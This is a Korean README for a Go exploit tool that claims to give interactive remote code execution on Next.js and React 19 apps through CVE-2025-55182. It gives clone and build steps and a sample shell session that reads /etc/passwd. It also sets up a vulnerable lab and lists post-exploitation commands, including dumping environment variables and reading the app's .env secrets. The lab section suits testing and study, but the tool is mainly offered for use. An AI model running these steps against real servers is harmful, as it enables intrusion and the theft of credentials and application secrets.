
CVE-2025-55182를 대상으로 하는 RCE 익스플로잇 도구로, React 19.0.0 - 19.2.0 및 Next.js 애플리케이션에 영향을 미치는 React Server Components(RSC)의 치명적인 취약점입니다.
CVE-2025-55182 (React Server Components) 대상 대화형 RCE 익스플로잇 도구
CVE-2025-55182는 React 19.0.0 - 19.2.0 및 Next.js 애플리케이션에 영향을 미치는 React Server Components (RSC)의 치명적인 취약점인 CVE-2025-55182를 표적으로 하는 최소한의 대화형 RCE 익스플로잇 도구입니다.
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go
./CVE-2025-55182
_____________ _______________ _______________ ________ .________ .________.____________ ______ ________
╲_ ___ ╲ ╲ ╱ ╱╲_ _____╱ ╲_____ ╲ _ ╲ ╲_____ ╲ │ ____╱ │ ____╱│ ____╱_ │╱ __ ╲ ╲_____ ╲
╱ ╲ ╲╱╲ Y ╱ │ __)_ ______ ╱ ____╱ ╱_╲ ╲ ╱ ____╱ │____ ╲ ______ │____ ╲ │____ ╲ │ │> < ╱ ____╱
╲ ╲____╲ ╱ │ ╲ ╱_____╱ ╱ ╲ ╲_╱ ╲╱ ╲ ╱ ╲ ╱_____╱ ╱ ╲╱ ╲│ ╱ ── ╲╱ ╲
╲______ ╱ ╲___╱ ╱_______ ╱ ╲_______ ╲_____ ╱╲_______ ╲╱______ ╱ ╱______ ╱______ ╱│___╲______ ╱╲_______ ╲
╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱ ╲╱
React2Shell RCE | CVE-2025-55182
@hghost010
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] 대상: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] 취약함
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
ghost@rce $ id
uid=1000(node) gid=1000(node) 그룹=1000(node)
ghost@rce $ whoami
node
ghost@rce $ pwd
/app
ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash
ghost@rce $ exit
https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f
영향 받는 버전:
패치된 버전:
이것을 안전하게 테스트하고 싶으신가요? 취약한 랩 환경을 설정하세요:
# 취약한 Next.js 앱 클론
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182
# 설치 및 실행
npm install --legacy-peer-deps
npm run dev
# 다른 터미널에서 ghost-scanner 실행
./CVE-2025-55182
# 입력: localhost:3000
ghost@rce $ id # 사용자 권한 확인
ghost@rce $ whoami # 현재 사용자 이름
ghost@rce $ pwd # 현재 디렉토리
ghost@rce $ ls -la # 파일 목록
ghost@rce $ cat /etc/passwd # 파일 읽기
ghost@rce $ uname -a # 시스템 정보
ghost@rce $ env # 환경 변수
ghost@rce $ ps aux # 실행 중인 프로세스
ghost@rce $ netstat -tulpn # 네트워크 연결
ghost@rce $ cat /app/.env # 애플리케이션 비밀
버그를 발견하셨나요? 이슈를 열어주세요
이 도구가 도움이 되셨다면:
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
👻 Hghost0x00이 제작함
즐거운 해킹 되세요 ⚡